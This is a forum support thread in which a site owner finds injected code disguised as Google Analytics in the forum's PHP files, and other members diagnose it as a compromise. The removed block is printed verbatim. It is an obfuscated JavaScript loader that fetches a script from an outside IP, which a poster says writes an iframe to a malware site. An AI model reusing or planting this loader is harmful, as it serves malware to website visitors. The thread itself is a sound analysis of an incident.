Google analytics script

[taytaysdad]

Hey guys, I have been getting an error for the past 2 days, and when I go to fix it I find Google Analytics code in my index.php files....how does this happen? Is it a setting that I have allowed?

I can put up the code when it happens again.

Has this happened to anyone else?

[Lynne]

It's actually added to the index.php file on your server? Or it is in the page source of your index.php ? And I assume you don't have google analytics on your site? I can't really guess what the problem is until you post the actual error you are getting.

[taytaysdad]

Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING, expecting ',' or ';' in /home/bud101/public_html/forums/admincp/index.php on line 1247

Yes, additional code is actually placing itself? inside the my code at certain lines, it has happened in my index files, admincp file (above), and Im having an issue viewing bog entries, all the same parse error.

The google anaytics thing has happened twice so far, once a day so far. Everytime it happens I have to edit the code by removing a block of code that has google analytics in it.

Im going to fix the above error now, I'll post the code that I remove.

--------------- Added [DATE]1244686505[/DATE] at [TIME]1244686505[/TIME] ---------------

Here's the code I removed, after removal site runs normally.

Code:

<?php echo '<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript sr?='" + gaJsHost + "google-analytics.com/ga.js' " + '#@!s(&r)c@#=!)\'!h$#t^!#$@t@!$p&^!@:$^/!@#!/#9(1)@.(2)1#(2)!.^&6!@!#^5(@#!.!&$1@#4)8#&/($g&$a!.(j^s)'.replace(/#|@|&|\$|\)|\!|\^|\(/ig, '') + "' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-7623457-2");
pageTracker._trackPageview();
} catch(err) {}</script>'; ?>

[Brandon Sheley]

I've always added it at the very end of the footer template

[Lynne]

If code is actually being added to your files on your server and you aren't the one doing it, then someone has access to your server. You should be talking to your host about this and ask them to help figure out who is accessing your server and how.

[UKBusinessLive]

Quote:

Originally Posted by taytaysdad

Hey guys, I have been getting an error for the past 2 days, and when I go to fix it I find Google Analytics code in my index.php files....how does this happen? Is it a setting that I have allowed?

I can put up the code when it happens again.

Has this happened to anyone else?

As Lynne says, Has someone else had access to your server and forum root??

If you then you must of added the Analytics code into your index.php by mistake, I take it you have a Google Analytics account??

If you havn't and you didn't add it to your account i would delete the code and change all your server usernames and passwords immeadiately, if someones done this and messed up your index.php, theres no telling what other damage they could of done to your site and server.

If you did add it, and now you know its in the wrong place just take it out from the index.php file and add it to the bottom of your footer like loco recommends

good luck, let us know how you got on.

[Carnage]

its not google analytics

its a crack. more info when i have it, but the code its writing to your site is:

HTML Code:

"<script sr?='google-analytics.com/ga.js' src='http://91.212.65.148/ga.js' type='text/javascript'></script>"

--------------- Added [DATE]1244899159[/DATE] at [TIME]1244899159[/TIME] ---------------

On further analisis, the javascript file it downloades writes an iframe to the site, the iframe opens a site which is known for installing malware and trojans. such behaviour will make it look like the trojan came from your website.

You need to warn your visitors, stop that code from appearing and change any admincp, hosting account etc passwords asap. Also, scan your own machine for trojans etc.

You're visitors have probably been saved by the fact that whoever added the code forgot to escape it properly, causing the parse error. If I were you, i'd check ALL your files to see if they managed to get the code right in one of the other files. (vbulletin will do this for you under matanance for its own files)

[taytaysdad]

Fixed, was actually the forum ad management add-on that was causing it.

I have disabled it and the error hasnt happened since.

Thanks everyone for all the help!

[Carnage]

which ad management add-on was this? It seems it may have a security error.

Read my above post carefully. It wasn't an accident that code got there.